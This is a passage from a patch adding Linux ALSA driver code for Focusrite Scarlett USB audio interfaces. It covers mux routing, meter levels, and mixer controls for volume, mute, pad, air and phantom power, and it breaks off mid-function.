++}
++
++/* Convert one mux entry from the interface and load into private->mux[] */
++static void scarlett2_usb_populate_mux(struct scarlett2_data *private,
++				       u32 mux_entry)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++
++	int dst_idx, src_idx;
++
++	dst_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_OUT,
++					  mux_entry & 0xFFF);
++	if (dst_idx < 0)
++		return;
++
++	if (dst_idx >= private->num_mux_dsts) {
++		usb_audio_err(private->mixer->chip,
++			"BUG: scarlett2_mux_id_to_num(%06x, OUT): %d >= %d",
++			mux_entry, dst_idx, private->num_mux_dsts);
++		return;
++	}
++
++	src_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_IN,
++					  mux_entry >> 12);
++	if (src_idx < 0)
++		return;
++
++	if (src_idx >= private->num_mux_srcs) {
++		usb_audio_err(private->mixer->chip,
++			"BUG: scarlett2_mux_id_to_num(%06x, IN): %d >= %d",
++			mux_entry, src_idx, private->num_mux_srcs);
++		return;
++	}
++
++	private->mux[dst_idx] = src_idx;
++}
++
++/* Send USB message to get mux inputs and then populate private->mux[] */
++static int scarlett2_usb_get_mux(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	int count = private->num_mux_dsts;
++	int err, i;
++
++	struct {
++		__le16 num;
++		__le16 count;
++	} __packed req;
++
++	__le32 data[SCARLETT2_MUX_MAX];
++
++	private->mux_updated = 0;
++
++	req.num = 0;
++	req.count = cpu_to_le16(count);
++
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MUX,
++			    &req, sizeof(req),
++			    data, count * sizeof(u32));
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < count; i++)
++		scarlett2_usb_populate_mux(private, le32_to_cpu(data[i]));
++
++	return 0;
++}
++
++/* Send USB messages to set mux inputs */
++static int scarlett2_usb_set_mux(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int table;
++
++	struct {
++		__le16 pad;
++		__le16 num;
++		__le32 data[SCARLETT2_MUX_MAX];
++	} __packed req;
++
++	req.pad = 0;
++
++	/* set mux settings for each rate */
++	for (table = 0; table < SCARLETT2_MUX_TABLES; table++) {
++		const struct scarlett2_mux_entry *entry;
++
++		/* i counts over the output array */
++		int i = 0, err;
++
++		req.num = cpu_to_le16(table);
++
++		/* loop through each entry */
++		for (entry = info->mux_assignment[table];
++		     entry->count;
++		     entry++) {
++			int j;
++			int port_type = entry->port_type;
++			int port_idx = entry->start;
++			int mux_idx = scarlett2_get_port_start_num(port_count,
++				SCARLETT2_PORT_OUT, port_type) + port_idx;
++			int dst_id = scarlett2_ports[port_type].id + port_idx;
++
++			/* Empty slots */
++			if (!dst_id) {
++				for (j = 0; j < entry->count; j++)
++					req.data[i++] = 0;
++				continue;
++			}
++
++			/* Non-empty mux slots use the lower 12 bits
++			 * for the destination and next 12 bits for
++			 * the source
++			 */
++			for (j = 0; j < entry->count; j++) {
++				int src_id = scarlett2_mux_src_num_to_id(
++					port_count, private->mux[mux_idx++]);
++				req.data[i++] = cpu_to_le32(dst_id |
++							    src_id << 12);
++				dst_id++;
++			}
++		}
++
++		err = scarlett2_usb(mixer, SCARLETT2_USB_SET_MUX,
++				    &req, (i + 1) * sizeof(u32),
++				    NULL, 0);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
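++
++/* e.g. routing PCM 1 (id 0x600) to Analogue Output 1 (id 0x080)
++ * produces the 32-bit mux entry 0x080 | (0x600 << 12) = 0x00600080.
++ */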
++
++/* Send USB message to get meter levels */
++static int scarlett2_usb_get_meter_levels(struct usb_mixer_interface *mixer,
++					  u16 num_meters, u16 *levels)
++{
++	struct {
++		__le16 pad;
++		__le16 num_meters;
++		__le32 magic;
++	} __packed req;
++	u32 resp[SCARLETT2_MAX_METERS];
++	int i, err;
++
++	req.pad = 0;
++	req.num_meters = cpu_to_le16(num_meters);
++	req.magic = cpu_to_le32(SCARLETT2_USB_METER_LEVELS_GET_MAGIC);
++	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_METER,
++			    &req, sizeof(req), resp, num_meters * sizeof(u32));
++	if (err < 0)
++		return err;
++
++	/* copy, convert to u16 */
++	for (i = 0; i < num_meters; i++)
++		levels[i] = resp[i];
++
++	return 0;
++}
++
++/*** Control Functions ***/
++
++/* helper function to create a new control */
++static int scarlett2_add_new_ctl(struct usb_mixer_interface *mixer,
++				 const struct snd_kcontrol_new *ncontrol,
++				 int index, int channels, const char *name,
++				 struct snd_kcontrol **kctl_return)
++{
++	struct snd_kcontrol *kctl;
++	struct usb_mixer_elem_info *elem;
++	int err;
++
++	elem = kzalloc(sizeof(*elem), GFP_KERNEL);
++	if (!elem)
++		return -ENOMEM;
++
++	/* We set USB_MIXER_BESPOKEN type, so that the core USB mixer code
++	 * ignores them for resume and other operations.
++	 * Also, the head.id field is set to 0, as we don't use this field.
++	 */
++	elem->head.mixer = mixer;
++	elem->control = index;
++	elem->head.id = 0;
++	elem->channels = channels;
++	elem->val_type = USB_MIXER_BESPOKEN;
++
++	kctl = snd_ctl_new1(ncontrol, elem);
++	if (!kctl) {
++		kfree(elem);
++		return -ENOMEM;
++	}
++	kctl->private_free = snd_usb_mixer_elem_free;
++
++	strscpy(kctl->id.name, name, sizeof(kctl->id.name));
++
++	err = snd_usb_mixer_add_control(&elem->head, kctl);
++	if (err < 0)
++		return err;
++
++	if (kctl_return)
++		*kctl_return = kctl;
++
++	return 0;
++}
++
++/*** Sync Control ***/
++
++/* Update sync control after receiving notification that the status
++ * has changed
++ */
++static int scarlett2_update_sync(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	private->sync_updated = 0;
++	return scarlett2_usb_get_sync_status(mixer, &private->sync);
++}
++
++static int scarlett2_sync_ctl_info(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_info *uinfo)
++{
++	static const char *texts[2] = {
++		"Unlocked", "Locked"
++	};
++	return snd_ctl_enum_info(uinfo, 1, 2, texts);
++}
++
++static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
++				  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->sync_updated) {
++		err = scarlett2_update_sync(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->sync;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_sync_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ,
++	.name = "",
++	.info = scarlett2_sync_ctl_info,
++	.get  = scarlett2_sync_ctl_get
++};
++
++static int scarlett2_add_sync_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	/* devices without a mixer also don't support reporting sync status */
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	return scarlett2_add_new_ctl(mixer, &scarlett2_sync_ctl,
++				     0, 1, "Sync Status", &private->sync_ctl);
++}
++
++/*** Analogue Line Out Volume Controls ***/
++
++/* Update hardware volume controls after receiving notification that
++ * they have changed
++ */
++static int scarlett2_update_volumes(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	struct scarlett2_usb_volume_status volume_status;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int err, i;
++	int mute;
++
++	private->vol_updated = 0;
++
++	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
++	if (err < 0)
++		return err;
++
++	private->master_vol = clamp(
++		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
++		0, SCARLETT2_VOLUME_BIAS);
++
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
++			private->dim_mute[i] = !!volume_status.dim_mute[i];
++
++	mute = private->dim_mute[SCARLETT2_BUTTON_MUTE];
++
++	for (i = 0; i < num_line_out; i++)
++		if (private->vol_sw_hw_switch[i]) {
++			private->vol[i] = private->master_vol;
++			private->mute_switch[i] = mute;
++		}
++
++	return 0;
++}
++
++static int scarlett2_volume_ctl_info(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = SCARLETT2_VOLUME_BIAS;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
++static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
++					   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->master_vol;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
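++/* Map an ALSA line-out control index to the device's line-out
++ * index, for devices whose hardware output order differs from
++ * the control order
++ */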
++static int line_out_remap(struct scarlett2_data *private, int index)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int line_out_count =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++
++	if (!info->line_out_remap_enable)
++		return index;
++
++	if (index >= line_out_count)
++		return index;
++
++	return info->line_out_remap[index];
++}
++
++static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->vol[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->vol[index];
++	val = ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->vol[index] = val;
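++	/* the device takes a signed value offset by the bias:
++	 * ALSA 0..SCARLETT2_VOLUME_BIAS maps to -BIAS..0 dB,
++	 * matching the TLV declared below
++	 */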
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
++				       index, val - SCARLETT2_VOLUME_BIAS);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const DECLARE_TLV_DB_MINMAX(
++	db_scale_scarlett2_gain, -SCARLETT2_VOLUME_BIAS * 100, 0
++);
++
++static const struct snd_kcontrol_new scarlett2_master_volume_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_volume_ctl_info,
++	.get  = scarlett2_master_volume_ctl_get,
++	.private_value = 0, /* max value */
++	.tlv = { .p = db_scale_scarlett2_gain }
++};
++
++static const struct snd_kcontrol_new scarlett2_line_out_volume_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_volume_ctl_info,
++	.get  = scarlett2_volume_ctl_get,
++	.put  = scarlett2_volume_ctl_put,
++	.private_value = 0, /* max value */
++	.tlv = { .p = db_scale_scarlett2_gain }
++};
++
++/*** Mute Switch Controls ***/
++
++static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->mute_switch[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mute_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->mute_switch[index] = val;
++
++	/* Send mute change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_mute_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_mute_ctl_get,
++	.put  = scarlett2_mute_ctl_put,
++};
++
++/*** HW/SW Volume Switch Controls ***/
++
++static void scarlett2_sw_hw_ctl_ro(struct scarlett2_data *private, int index)
++{
++	private->sw_hw_ctls[index]->vd[0].access &=
++		~SNDRV_CTL_ELEM_ACCESS_WRITE;
++}
++
++static void scarlett2_sw_hw_ctl_rw(struct scarlett2_data *private, int index)
++{
++	private->sw_hw_ctls[index]->vd[0].access |=
++		SNDRV_CTL_ELEM_ACCESS_WRITE;
++}
++
++static int scarlett2_sw_hw_enum_ctl_info(struct snd_kcontrol *kctl,
++					 struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[2] = {
++		"SW", "HW"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 2, values);
++}
++
++static int scarlett2_sw_hw_enum_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++
++	ucontrol->value.enumerated.item[0] = private->vol_sw_hw_switch[index];
++	return 0;
++}
++
++static void scarlett2_vol_ctl_set_writable(struct usb_mixer_interface *mixer,
++					   int index, int value)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	struct snd_card *card = mixer->chip->card;
++
++	/* Set/Clear write bits */
++	if (value) {
++		private->vol_ctls[index]->vd[0].access |=
++			SNDRV_CTL_ELEM_ACCESS_WRITE;
++		private->mute_ctls[index]->vd[0].access |=
++			SNDRV_CTL_ELEM_ACCESS_WRITE;
++	} else {
++		private->vol_ctls[index]->vd[0].access &=
++			~SNDRV_CTL_ELEM_ACCESS_WRITE;
++		private->mute_ctls[index]->vd[0].access &=
++			~SNDRV_CTL_ELEM_ACCESS_WRITE;
++	}
++
++	/* Notify of write bit and possible value change */
++	snd_ctl_notify(card,
++		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
++		       &private->vol_ctls[index]->id);
++	snd_ctl_notify(card,
++		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
++		       &private->mute_ctls[index]->id);
++}
++
++static int scarlett2_sw_hw_change(struct usb_mixer_interface *mixer,
++				  int ctl_index, int val)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, ctl_index);
++	int err;
++
++	private->vol_sw_hw_switch[index] = val;
++
++	/* Change access mode to RO (hardware controlled volume)
++	 * or RW (software controlled volume)
++	 */
++	scarlett2_vol_ctl_set_writable(mixer, ctl_index, !val);
++
++	/* Reset volume/mute to master volume/mute */
++	private->vol[index] = private->master_vol;
++	private->mute_switch[index] = private->dim_mute[SCARLETT2_BUTTON_MUTE];
++
++	/* Set SW volume to current HW volume */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
++		index, private->master_vol - SCARLETT2_VOLUME_BIAS);
++	if (err < 0)
++		return err;
++
++	/* Set SW mute to current HW mute */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
++		index, private->dim_mute[SCARLETT2_BUTTON_MUTE]);
++	if (err < 0)
++		return err;
++
++	/* Send SW/HW switch change to the device */
++	return scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_SW_HW_SWITCH,
++					index, val);
++}
++
++static int scarlett2_sw_hw_enum_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int ctl_index = elem->control;
++	int index = line_out_remap(private, ctl_index);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->vol_sw_hw_switch[index];
++	val = !!ucontrol->value.enumerated.item[0];
++
++	if (oval == val)
++		goto unlock;
++
++	err = scarlett2_sw_hw_change(mixer, ctl_index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_sw_hw_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_sw_hw_enum_ctl_info,
++	.get  = scarlett2_sw_hw_enum_ctl_get,
++	.put  = scarlett2_sw_hw_enum_ctl_put,
++};
++
++/*** Line Level/Instrument Level Switch Controls ***/
++
++static int scarlett2_update_input_other(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	private->input_other_updated = 0;
++
++	if (info->level_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
++			info->level_input_count + info->level_input_first,
++			private->level_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->pad_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PAD_SWITCH,
++			info->pad_input_count, private->pad_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->air_input_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_AIR_SWITCH,
++			info->air_input_count, private->air_switch);
++		if (err < 0)
++			return err;
++	}
++
++	if (info->phantom_count) {
++		int err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
++			info->phantom_count, private->phantom_switch);
++		if (err < 0)
++			return err;
++
++		err = scarlett2_usb_get_config(
++			mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE,
++			1, &private->phantom_persistence);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++static int scarlett2_level_enum_ctl_info(struct snd_kcontrol *kctl,
++					 struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[2] = {
++		"Line", "Inst"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 2, values);
++}
++
++static int scarlett2_level_enum_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int index = elem->control + info->level_input_first;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->level_switch[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_level_enum_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	int index = elem->control + info->level_input_first;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->level_switch[index];
++	val = !!ucontrol->value.enumerated.item[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->level_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LEVEL_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_level_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_level_enum_ctl_info,
++	.get  = scarlett2_level_enum_ctl_get,
++	.put  = scarlett2_level_enum_ctl_put,
++};
++
++/*** Pad Switch Controls ***/
++
++static int scarlett2_pad_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] =
++		private->pad_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_pad_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->pad_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->pad_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PAD_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_pad_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_pad_ctl_get,
++	.put  = scarlett2_pad_ctl_put,
++};
++
++/*** Air Switch Controls ***/
++
++static int scarlett2_air_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->air_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_air_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->air_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->air_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_AIR_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_air_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_air_ctl_get,
++	.put  = scarlett2_air_ctl_put,
++};
++
++/*** Phantom Switch Controls ***/
++
++static int scarlett2_phantom_ctl_get(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->input_other_updated) {
++		err = scarlett2_update_input_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] =
++		private->phantom_switch[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_phantom_ctl_put(struct snd_kcontrol *kctl,
++				     struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->phantom_switch[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->phantom_switch[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_PHANTOM_SWITCH,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_phantom_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_phantom_ctl_get,
++	.put  = scarlett2_phantom_ctl_put,
++};
++
++/*** Phantom Persistence Control ***/
++
++static int scarlett2_phantom_persistence_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->phantom_persistence;
++	return 0;
++}
++
++static int scarlett2_phantom_persistence_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int index = elem->control;
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->phantom_persistence;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->phantom_persistence = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_PHANTOM_PERSISTENCE, index, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_phantom_persistence_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_phantom_persistence_ctl_get,
++	.put  = scarlett2_phantom_persistence_ctl_put,
++};
++
++/*** Direct Monitor Control ***/
++
++static int scarlett2_update_monitor_other(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int err;
++
++	/* monitor_other_enable[0] enables speaker switching
++	 * monitor_other_enable[1] enables talkback
++	 */
++	u8 monitor_other_enable[2];
++
++	/* monitor_other_switch[0] activates the alternate speakers
++	 * monitor_other_switch[1] activates talkback
++	 */
++	u8 monitor_other_switch[2];
++
++	private->monitor_other_updated = 0;
++
++	if (info->direct_monitor)
++		return scarlett2_usb_get_config(
